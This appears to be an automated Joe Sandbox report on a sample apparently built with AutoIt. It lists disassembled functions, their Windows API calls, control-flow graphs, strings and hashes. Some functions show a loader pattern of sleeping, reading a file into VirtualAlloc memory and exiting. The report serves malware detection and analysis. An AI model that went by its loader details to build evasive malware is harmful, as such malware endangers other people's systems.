            Similarity
            • API ID: CurrentDirectoryExecuteFileForegroundModuleNameShellWindow_wcslen
            • String ID: runas
            • API String ID: 448630720-4000483414
            • Opcode ID: 4a411220d9d924829277c920e834dd8beea132e55e83c424839d4009532f4cef
            • Instruction ID: 02ddf8968be83cca8e19a1ff745ed1948f68494836249a437dac04ab8749e099
            • Opcode Fuzzy Hash: 4a411220d9d924829277c920e834dd8beea132e55e83c424839d4009532f4cef
            • Instruction Fuzzy Hash: C611E4B16083416BCB54FF24DC419AE77A8AFD3390F44042DF0C252092CF3D8609B322
            Function 0100DBBE Relevance: 6.0, APIs: 4, Instructions: 29filestringCOMMON
            Download Yara Rule
            APIs
            • lstrlenW.KERNEL32(?,00FE5222), ref: 0100DBCE
            • GetFileAttributesW.KERNELBASE(?), ref: 0100DBDD
            • FindFirstFileW.KERNELBASE(?,?), ref: 0100DBEE
            • FindClose.KERNEL32(00000000), ref: 0100DBFA
            Memory Dump Source
            • Source File: 00000000.00000002.1708463643.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
            • Associated: 00000000.00000002.1708272707.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708572201.000000000103C000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708572201.0000000001062000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708672963.000000000106C000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708720190.0000000001074000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_fa0000_8t1uarSZFV.jbxd
            Similarity
            • API ID: FileFind$AttributesCloseFirstlstrlen
            • String ID:
            • API String ID: 2695905019-0
            • Opcode ID: e9c95fef3de83700009139ebd1bb0e3f6fc41f76cff52aa3ef7b1af5dc57ab29
            • Instruction ID: 4628b325a2e229333937865814c3fe617765af5e958bd09b99a25357f2167ac3
            • Opcode Fuzzy Hash: e9c95fef3de83700009139ebd1bb0e3f6fc41f76cff52aa3ef7b1af5dc57ab29
            • Instruction Fuzzy Hash: 86F0A73141052597B2316BFC990D86A3BAC9E01334F004743F8B5D10D0EBB5595447A5
            Function 00FAD730 Relevance: 21.6, APIs: 14, Instructions: 625windowsleeptimeCOMMON
            Download Yara Rule
            APIs
            • GetInputState.USER32 ref: 00FAD807
            • timeGetTime.WINMM ref: 00FADA07
            • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00FADB28
            • TranslateMessage.USER32(?), ref: 00FADB7B
            • DispatchMessageW.USER32(?), ref: 00FADB89
            • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00FADB9F
            • Sleep.KERNEL32(0000000A), ref: 00FADBB1
            Memory Dump Source
            • Source File: 00000000.00000002.1708463643.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
            • Associated: 00000000.00000002.1708272707.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708572201.000000000103C000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708572201.0000000001062000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708672963.000000000106C000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708720190.0000000001074000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_fa0000_8t1uarSZFV.jbxd
            Similarity
            • API ID: Message$Peek$DispatchInputSleepStateTimeTranslatetime
            • String ID:
            • API String ID: 2189390790-0
            • Opcode ID: b78504acaf549d450649f80be42b8e0eb42caa2365b627091401bc2e67b147b1
            • Instruction ID: 1b0db80f5840cf36f9f4982a58f31efb72f0ac5e8758b965033b756d527c2ace
            • Opcode Fuzzy Hash: b78504acaf549d450649f80be42b8e0eb42caa2365b627091401bc2e67b147b1
            • Instruction Fuzzy Hash: EF4234B0A08305DFD738CF24C884BBAB7E4BF86324F14451DE596876A1D779E844EB92
            Function 00FA2CD4 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 53windowregistryCOMMON
            Download Yara Rule

            Control-flow Graph

            APIs
            • GetSysColorBrush.USER32(0000000F), ref: 00FA2D07
            • RegisterClassExW.USER32(00000030), ref: 00FA2D31
            • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00FA2D42
            • InitCommonControlsEx.COMCTL32(?), ref: 00FA2D5F
            • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00FA2D6F
            • LoadIconW.USER32(000000A9), ref: 00FA2D85
            • ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00FA2D94
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.1708463643.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
            • Associated: 00000000.00000002.1708272707.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708572201.000000000103C000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708572201.0000000001062000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708672963.000000000106C000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708720190.0000000001074000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_fa0000_8t1uarSZFV.jbxd
            Similarity
            • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
            • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
            • API String ID: 2914291525-1005189915
            • Opcode ID: 2f6f359a3379f1a4ec5c69c4d877f8b132efe440e327110c64ada6b8f3058e5e
            • Instruction ID: 3f189e5175ce6b0f8072710c8c53630487f9da0b2e1f29a0be39179359be84ee
            • Opcode Fuzzy Hash: 2f6f359a3379f1a4ec5c69c4d877f8b132efe440e327110c64ada6b8f3058e5e
            • Instruction Fuzzy Hash: 4321E4B5D11348AFEB20DFA4E949ADDBBB8FB08700F00811AF991F6284D7BA45408F90
            Function 00FE065B Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 272COMMONLIBRARYCODE
            Download Yara Rule

            Control-flow Graph

            • Executed
            • Not Executed
            control_flow_graph 302 fe065b-fe068b call fe042f 305 fe068d-fe0698 call fcf2c6 302->305 306 fe06a6-fe06b2 call fd5221 302->306 311 fe069a-fe06a1 call fcf2d9 305->311 312 fe06cb-fe0714 call fe039a 306->312 313 fe06b4-fe06c9 call fcf2c6 call fcf2d9 306->313 322 fe097d-fe0983 311->322 320 fe0716-fe071f 312->320 321 fe0781-fe078a GetFileType 312->321 313->311 325 fe0756-fe077c GetLastError call fcf2a3 320->325 326 fe0721-fe0725 320->326 327 fe078c-fe07bd GetLastError call fcf2a3 CloseHandle 321->327 328 fe07d3-fe07d6 321->328 325->311 326->325 331 fe0727-fe0754 call fe039a 326->331 327->311 339 fe07c3-fe07ce call fcf2d9 327->339 329 fe07df-fe07e5 328->329 330 fe07d8-fe07dd 328->330 334 fe07e9-fe0837 call fd516a 329->334 335 fe07e7 329->335 330->334 331->321 331->325 345 fe0839-fe0845 call fe05ab 334->345 346 fe0847-fe086b call fe014d 334->346 335->334 339->311 345->346 353 fe086f-fe0879 call fd86ae 345->353 351 fe087e-fe08c1 346->351 352 fe086d 346->352 355 fe08e2-fe08f0 351->355 356 fe08c3-fe08c7 351->356 352->353 353->322 359 fe097b 355->359 360 fe08f6-fe08fa 355->360 356->355 358 fe08c9-fe08dd 356->358 358->355 359->322 360->359 361 fe08fc-fe092f CloseHandle call fe039a 360->361 364 fe0963-fe0977 361->364 365 fe0931-fe095d GetLastError call fcf2a3 call fd5333 361->365 364->359 365->364
            APIs
              • Part of subcall function 00FE039A: CreateFileW.KERNELBASE(00000000,00000000,?,00FE0704,?,?,00000000,?,00FE0704,00000000,0000000C), ref: 00FE03B7
            • GetLastError.KERNEL32 ref: 00FE076F
            • __dosmaperr.LIBCMT ref: 00FE0776
            • GetFileType.KERNELBASE(00000000), ref: 00FE0782
            • GetLastError.KERNEL32 ref: 00FE078C
            • __dosmaperr.LIBCMT ref: 00FE0795
            • CloseHandle.KERNEL32(00000000), ref: 00FE07B5
            • CloseHandle.KERNEL32(?), ref: 00FE08FF
            • GetLastError.KERNEL32 ref: 00FE0931
            • __dosmaperr.LIBCMT ref: 00FE0938
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.1708463643.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
            • Associated: 00000000.00000002.1708272707.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708572201.000000000103C000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708572201.0000000001062000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708672963.000000000106C000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708720190.0000000001074000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_fa0000_8t1uarSZFV.jbxd
            Similarity
            • API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
            • String ID: H
            • API String ID: 4237864984-2852464175
            • Opcode ID: 6406311a44750863ae23505ab53d591199913ab97fea05aa68a1aa60ecda4a7f
            • Instruction ID: 19f6e17bdd8faa743284517606e2896ebc153416659939627d8bcb3a4b0f1dc4
            • Opcode Fuzzy Hash: 6406311a44750863ae23505ab53d591199913ab97fea05aa68a1aa60ecda4a7f
            • Instruction Fuzzy Hash: 32A14632E001858FDF19EF68DC52BAE7BA1AB06320F14015DF851EB391CB799D52EB91
            Function 00FA344D Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 201registryCOMMON
            Download Yara Rule

            Control-flow Graph

            APIs
              • Part of subcall function 00FA3A5A: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,01071418,?,00FA2E7F,?,?,?,00000000), ref: 00FA3A78
              • Part of subcall function 00FA3357: GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 00FA3379
            • RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,\Include\), ref: 00FA356A
            • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?), ref: 00FE318D
            • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000), ref: 00FE31CE
            • RegCloseKey.ADVAPI32(?), ref: 00FE3210
            • _wcslen.LIBCMT ref: 00FE3277
            • _wcslen.LIBCMT ref: 00FE3286
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.1708463643.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
            • Associated: 00000000.00000002.1708272707.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708572201.000000000103C000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708572201.0000000001062000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708672963.000000000106C000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708720190.0000000001074000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_fa0000_8t1uarSZFV.jbxd
            Similarity
            • API ID: NameQueryValue_wcslen$CloseFileFullModuleOpenPath
            • String ID: Include$Software\AutoIt v3\AutoIt$\$\Include\
            • API String ID: 98802146-2727554177
            • Opcode ID: faef4ea50563803752009826224c54cf283ef89264dafabe27391980aee79e7f
            • Instruction ID: a24aaa1171ec56dc338085fbc9b2fefba75a913e0b0ea79ecf2552ba336fcb1a
            • Opcode Fuzzy Hash: faef4ea50563803752009826224c54cf283ef89264dafabe27391980aee79e7f
            • Instruction Fuzzy Hash: BE71A2B18043019ED324DF25DC859ABB7E8FF85350F40882EF5C5E7154DB799A48DB61
            Function 00FA2B83 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 63windowregistryCOMMON
            Download Yara Rule

            Control-flow Graph

            APIs
            • GetSysColorBrush.USER32(0000000F), ref: 00FA2B8E
            • LoadCursorW.USER32(00000000,00007F00), ref: 00FA2B9D
            • LoadIconW.USER32(00000063), ref: 00FA2BB3
            • LoadIconW.USER32(000000A4), ref: 00FA2BC5
            • LoadIconW.USER32(000000A2), ref: 00FA2BD7
            • LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 00FA2BEF
            • RegisterClassExW.USER32(?), ref: 00FA2C40
              • Part of subcall function 00FA2CD4: GetSysColorBrush.USER32(0000000F), ref: 00FA2D07
              • Part of subcall function 00FA2CD4: RegisterClassExW.USER32(00000030), ref: 00FA2D31
              • Part of subcall function 00FA2CD4: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00FA2D42
              • Part of subcall function 00FA2CD4: InitCommonControlsEx.COMCTL32(?), ref: 00FA2D5F
              • Part of subcall function 00FA2CD4: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00FA2D6F
              • Part of subcall function 00FA2CD4: LoadIconW.USER32(000000A9), ref: 00FA2D85
              • Part of subcall function 00FA2CD4: ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00FA2D94
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.1708463643.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
            • Associated: 00000000.00000002.1708272707.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708572201.000000000103C000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708572201.0000000001062000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708672963.000000000106C000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708720190.0000000001074000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_fa0000_8t1uarSZFV.jbxd
            Similarity
            • API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
            • String ID: #$0$AutoIt v3
            • API String ID: 423443420-4155596026
            • Opcode ID: 56ac6f88124be1861bf229a8b19e073a2386cde423ab26b73220a71468453f13
            • Instruction ID: b03ffc09dc4d34f9e5c9df882afd56b9a77e94dc2998f945953865d36106df20
            • Opcode Fuzzy Hash: 56ac6f88124be1861bf229a8b19e073a2386cde423ab26b73220a71468453f13
            • Instruction Fuzzy Hash: B0214975E00318ABEB219FA5E949AA97FB9FB48B50F00801BF580F66C4D7BA0554DF90
            Function 00FA3170 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 145windowtimeregistryCOMMON
            Download Yara Rule

            Control-flow Graph

            • Executed
            • Not Executed
            control_flow_graph 443 fa3170-fa3185 444 fa3187-fa318a 443->444 445 fa31e5-fa31e7 443->445 446 fa31eb 444->446 447 fa318c-fa3193 444->447 445->444 448 fa31e9 445->448 452 fe2dfb-fe2e23 call fa18e2 call fbe499 446->452 453 fa31f1-fa31f6 446->453 449 fa3199-fa319e 447->449 450 fa3265-fa326d PostQuitMessage 447->450 451 fa31d0-fa31d8 DefWindowProcW 448->451 455 fe2e7c-fe2e90 call 100bf30 449->455 456 fa31a4-fa31a8 449->456 458 fa3219-fa321b 450->458 457 fa31de-fa31e4 451->457 488 fe2e28-fe2e2f 452->488 459 fa31f8-fa31fb 453->459 460 fa321d-fa3244 SetTimer RegisterWindowMessageW 453->460 455->458 482 fe2e96 455->482 464 fa31ae-fa31b3 456->464 465 fe2e68-fe2e77 call 100c161 456->465 458->457 461 fe2d9c-fe2d9f 459->461 462 fa3201-fa3214 KillTimer call fa30f2 call fa3c50 459->462 460->458 466 fa3246-fa3251 CreatePopupMenu 460->466 474 fe2dd7-fe2df6 MoveWindow 461->474 475 fe2da1-fe2da5 461->475 462->458 471 fe2e4d-fe2e54 464->471 472 fa31b9-fa31be 464->472 465->458 466->458 471->451 476 fe2e5a-fe2e63 call 1000ad7 471->476 480 fa3253-fa3263 call fa326f 472->480 481 fa31c4-fa31ca 472->481 474->458 483 fe2dc6-fe2dd2 SetFocus 475->483 484 fe2da7-fe2daa 475->484 476->451 480->458 481->451 481->488 482->451 483->458 484->481 489 fe2db0-fe2dc1 call fa18e2 484->489 488->451 492 fe2e35-fe2e48 call fa30f2 call fa3837 488->492 489->458 492->451
            APIs
            • DefWindowProcW.USER32(?,?,?,?,?,?,?,?,?,00FA316A,?,?), ref: 00FA31D8
            • KillTimer.USER32(?,00000001,?,?,?,?,?,00FA316A,?,?), ref: 00FA3204
            • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00FA3227
            • RegisterWindowMessageW.USER32(TaskbarCreated,?,?,?,?,?,00FA316A,?,?), ref: 00FA3232
            • CreatePopupMenu.USER32 ref: 00FA3246
            • PostQuitMessage.USER32(00000000), ref: 00FA3267
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.1708463643.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
            • Associated: 00000000.00000002.1708272707.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708572201.000000000103C000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708572201.0000000001062000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708672963.000000000106C000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708720190.0000000001074000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_fa0000_8t1uarSZFV.jbxd
            Similarity
            • API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
            • String ID: TaskbarCreated
            • API String ID: 129472671-2362178303
            • Opcode ID: 9a4f5db5f88acb63d3053650d740514a6d2c6750bdcdb6679b843b3871f682d9
            • Instruction ID: 914fb37365305bda1269c7791ace99e05ec879649fdcf7c26b0ddf53a67f99fb
            • Opcode Fuzzy Hash: 9a4f5db5f88acb63d3053650d740514a6d2c6750bdcdb6679b843b3871f682d9
            • Instruction Fuzzy Hash: 14417DB2E40200ABEB351B78DD0DB79369DFB47360F04411AF982E61C5DB7A9E41B3A1
            Function 00FD8D45 Relevance: 13.8, APIs: 9, Instructions: 300COMMONLIBRARYCODE
            Download Yara Rule

            Control-flow Graph

            • Executed
            • Not Executed
            control_flow_graph 499 fd8d45-fd8d55 500 fd8d6f-fd8d71 499->500 501 fd8d57-fd8d6a call fcf2c6 call fcf2d9 499->501 503 fd90d9-fd90e6 call fcf2c6 call fcf2d9 500->503 504 fd8d77-fd8d7d 500->504 517 fd90f1 501->517 523 fd90ec call fd27ec 503->523 504->503 507 fd8d83-fd8dae 504->507 507->503 510 fd8db4-fd8dbd 507->510 513 fd8dbf-fd8dd2 call fcf2c6 call fcf2d9 510->513 514 fd8dd7-fd8dd9 510->514 513->523 515 fd8ddf-fd8de3 514->515 516 fd90d5-fd90d7 514->516 515->516 521 fd8de9-fd8ded 515->521 522 fd90f4-fd90f9 516->522 517->522 521->513 525 fd8def-fd8e06 521->525 523->517 528 fd8e08-fd8e0b 525->528 529 fd8e23-fd8e2c 525->529 530 fd8e0d-fd8e13 528->530 531 fd8e15-fd8e1e 528->531 532 fd8e2e-fd8e45 call fcf2c6 call fcf2d9 call fd27ec 529->532 533 fd8e4a-fd8e54 529->533 530->531 530->532 536 fd8ebf-fd8ed9 531->536 561 fd900c 532->561 534 fd8e5b-fd8e79 call fd3820 call fd29c8 * 2 533->534 535 fd8e56-fd8e58 533->535 570 fd8e7b-fd8e91 call fcf2d9 call fcf2c6 534->570 571 fd8e96-fd8ebc call fd9424 534->571 535->534 538 fd8fad-fd8fb6 call fdf89b 536->538 539 fd8edf-fd8eef 536->539 550 fd9029 538->550 551 fd8fb8-fd8fca 538->551 539->538 542 fd8ef5-fd8ef7 539->542 542->538 546 fd8efd-fd8f23 542->546 546->538 553 fd8f29-fd8f3c 546->553 559 fd902d-fd9045 ReadFile 550->559 551->550 555 fd8fcc-fd8fdb GetConsoleMode 551->555 553->538 557 fd8f3e-fd8f40 553->557 555->550 560 fd8fdd-fd8fe1 555->560 557->538 562 fd8f42-fd8f6d 557->562 564 fd9047-fd904d 559->564 565 fd90a1-fd90ac GetLastError 559->565 560->559 567 fd8fe3-fd8ffd ReadConsoleW 560->567 568 fd900f-fd9019 call fd29c8 561->568 562->538 569 fd8f6f-fd8f82 562->569 564->565 566 fd904f 564->566 572 fd90ae-fd90c0 call fcf2d9 call fcf2c6 565->572 573 fd90c5-fd90c8 565->573 575 fd9052-fd9064 566->575 577 fd8fff GetLastError 567->577 578 fd901e-fd9027 567->578 568->522 569->538 582 fd8f84-fd8f86 569->582 570->561 571->536 572->561 579 fd90ce-fd90d0 573->579 580 fd9005-fd900b call fcf2a3 573->580 575->568 585 fd9066-fd906a 575->585 577->580 578->575 579->568 580->561 582->538 589 fd8f88-fd8fa8 582->589 592 fd906c-fd907c call fd8a61 585->592 593 fd9083-fd908e 585->593 589->538 604 fd907f-fd9081 592->604 598 fd909a-fd909f call fd88a1 593->598 599 fd9090 call fd8bb1 593->599 605 fd9095-fd9098 598->605 599->605 604->568 605->604
            Memory Dump Source
            • Source File: 00000000.00000002.1708463643.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
            • Associated: 00000000.00000002.1708272707.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708572201.000000000103C000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708572201.0000000001062000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708672963.000000000106C000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708720190.0000000001074000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_fa0000_8t1uarSZFV.jbxd
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: d0425c9728b576dc6d1681900189e250412755e9cbfd9dfe6bdf7fb60dfb85fa
            • Instruction ID: 171afccf01e5d135626abff213e6e5e6b5d7fe87c5e3185cc647383b4d9a4af5
            • Opcode Fuzzy Hash: d0425c9728b576dc6d1681900189e250412755e9cbfd9dfe6bdf7fb60dfb85fa
            • Instruction Fuzzy Hash: 2FC12575D08349AFDB11DFE8D845BADBBB2AF09320F0C415AF454A7382C7798942EB61
            Function 00F025C0 Relevance: 10.7, APIs: 7, Instructions: 239fileCOMMON
            Download Yara Rule

            Control-flow Graph

            • Executed
            • Not Executed
            control_flow_graph 607 f025c0-f0266e call f00000 610 f02675-f0269b call f034d0 CreateFileW 607->610 613 f026a2-f026b2 610->613 614 f0269d 610->614 622 f026b4 613->622 623 f026b9-f026d3 VirtualAlloc 613->623 615 f027ed-f027f1 614->615 616 f02833-f02836 615->616 617 f027f3-f027f7 615->617 619 f02839-f02840 616->619 620 f02803-f02807 617->620 621 f027f9-f027fc 617->621 624 f02842-f0284d 619->624 625 f02895-f028aa 619->625 626 f02817-f0281b 620->626 627 f02809-f02813 620->627 621->620 622->615 628 f026d5 623->628 629 f026da-f026f1 ReadFile 623->629 630 f02851-f0285d 624->630 631 f0284f 624->631 632 f028ba-f028c2 625->632 633 f028ac-f028b7 VirtualFree 625->633 634 f0282b 626->634 635 f0281d-f02827 626->635 627->626 628->615 636 f026f3 629->636 637 f026f8-f02738 VirtualAlloc 629->637 640 f02871-f0287d 630->640 641 f0285f-f0286f 630->641 631->625 633->632 634->616 635->634 636->615 638 f0273a 637->638 639 f0273f-f0275a call f03720 637->639 638->615 647 f02765-f0276f 639->647 644 f0288a-f02890 640->644 645 f0287f-f02888 640->645 643 f02893 641->643 643->619 644->643 645->643 648 f02771-f027a0 call f03720 647->648 649 f027a2-f027b6 call f03530 647->649 648->647 655 f027b8 649->655 656 f027ba-f027be 649->656 655->615 657 f027c0-f027c4 FindCloseChangeNotification 656->657 658 f027ca-f027ce 656->658 657->658 659 f027d0-f027db VirtualFree 658->659 660 f027de-f027e7 658->660 659->660 660->610 660->615
            APIs
            • CreateFileW.KERNELBASE(00000000,?,80000000,00000007,00000000,00000003,00000080,00000000,?,00000000), ref: 00F02691
            • VirtualFree.KERNELBASE(00000000,00000000,00008000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 00F028B7
            Memory Dump Source
            • Source File: 00000000.00000002.1708173100.0000000000F00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F00000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_f00000_8t1uarSZFV.jbxd
            Similarity
            • API ID: CreateFileFreeVirtual
            • String ID:
            • API String ID: 204039940-0
            • Opcode ID: ed516440ab75e0c1ded8a7b1870b24392b753ad5cf7d4aa929dd61e32643855c
            • Instruction ID: 58bed2a2c15dc33c7b8215caf66f1d619f4d83c1394035764aa892f2960aaba7
            • Opcode Fuzzy Hash: ed516440ab75e0c1ded8a7b1870b24392b753ad5cf7d4aa929dd61e32643855c
            • Instruction Fuzzy Hash: 4DA11775E00209EBDB54CFA4C998BEEB7B5BF48314F208159E501BB2C0D7799A41EBA4
            Function 00FA2C63 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 44COMMON
            Download Yara Rule

            Control-flow Graph

            • Executed
            • Not Executed
            control_flow_graph 671 fa2c63-fa2cd3 CreateWindowExW * 2 ShowWindow * 2
            APIs
            • CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00FA2C91
            • CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00FA2CB2
            • ShowWindow.USER32(00000000,?,?,?,?,?,?,00FA1CAD,?), ref: 00FA2CC6
            • ShowWindow.USER32(00000000,?,?,?,?,?,?,00FA1CAD,?), ref: 00FA2CCF
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.1708463643.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
            • Associated: 00000000.00000002.1708272707.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708572201.000000000103C000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708572201.0000000001062000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708672963.000000000106C000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708720190.0000000001074000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_fa0000_8t1uarSZFV.jbxd
            Similarity
            • API ID: Window$CreateShow
            • String ID: AutoIt v3$edit
            • API String ID: 1584632944-3779509399
            • Opcode ID: ed825e1b7fc0dff8bc63a876d8c1f5fb33f144b164841bd046ab287c0e299ad7
            • Instruction ID: 8b60eae2648c7b0d44d3b72d57002d0b9fa786ece591255577d783236a812bdb
            • Opcode Fuzzy Hash: ed825e1b7fc0dff8bc63a876d8c1f5fb33f144b164841bd046ab287c0e299ad7
            • Instruction Fuzzy Hash: 2DF0B7759503907AEB311727AC09E772EBDE7C6F50B01805AF944F6594C67A1850DBB0
            Function 00F023B0 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 135fileCOMMON
            Download Yara Rule

            Control-flow Graph

            • Executed
            • Not Executed
            control_flow_graph 786 f023b0-f024b4 call f00000 call f022a0 CreateFileW 793 f024b6 786->793 794 f024bb-f024cb 786->794 795 f0256b-f02570 793->795 797 f024d2-f024ec VirtualAlloc 794->797 798 f024cd 794->798 799 f024f0-f02507 ReadFile 797->799 800 f024ee 797->800 798->795 801 f02509 799->801 802 f0250b-f02545 call f022e0 call f012a0 799->802 800->795 801->795 807 f02561-f02569 ExitProcess 802->807 808 f02547-f0255c call f02330 802->808 807->795 808->807
            APIs
              • Part of subcall function 00F022A0: Sleep.KERNELBASE(000001F4), ref: 00F022B1
            • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 00F024AA
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.1708173100.0000000000F00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F00000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_f00000_8t1uarSZFV.jbxd
            Similarity
            • API ID: CreateFileSleep
            • String ID: SGZQMSO92I8ML
            • API String ID: 2694422964-2071075998
            • Opcode ID: 13c6803767f886b5afb506aabee59da20dbb351a62d168796ba766d9fb02b439
            • Instruction ID: e3c437138f231588723673f1830a106850057e5d5b973d929cfa207c55830eb1
            • Opcode Fuzzy Hash: 13c6803767f886b5afb506aabee59da20dbb351a62d168796ba766d9fb02b439
            • Instruction Fuzzy Hash: DF517E31D14249EAEF10DBE4CC19BEEBB78AF44300F104199E608BB2C0D7B91B45EBA5
            Function 01012947 Relevance: 7.8, APIs: 5, Instructions: 313fileCOMMON
            Download Yara Rule

            Control-flow Graph

            APIs
